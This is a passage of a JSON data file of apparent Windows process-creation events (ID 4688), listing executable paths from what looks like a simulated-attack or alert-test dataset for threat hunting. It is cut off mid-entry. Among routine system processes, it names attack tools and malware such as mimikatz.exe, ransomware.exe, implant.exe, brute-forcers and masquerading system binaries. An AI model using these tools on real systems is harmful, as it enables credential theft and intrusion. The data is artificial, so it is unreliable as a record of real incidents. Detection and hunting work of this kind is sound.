4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-\\nDE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicin\\ngstack_31bf3856ad364e35_10.0.14393.2602_none_7ee60\\n20e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.ex\\ne\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program 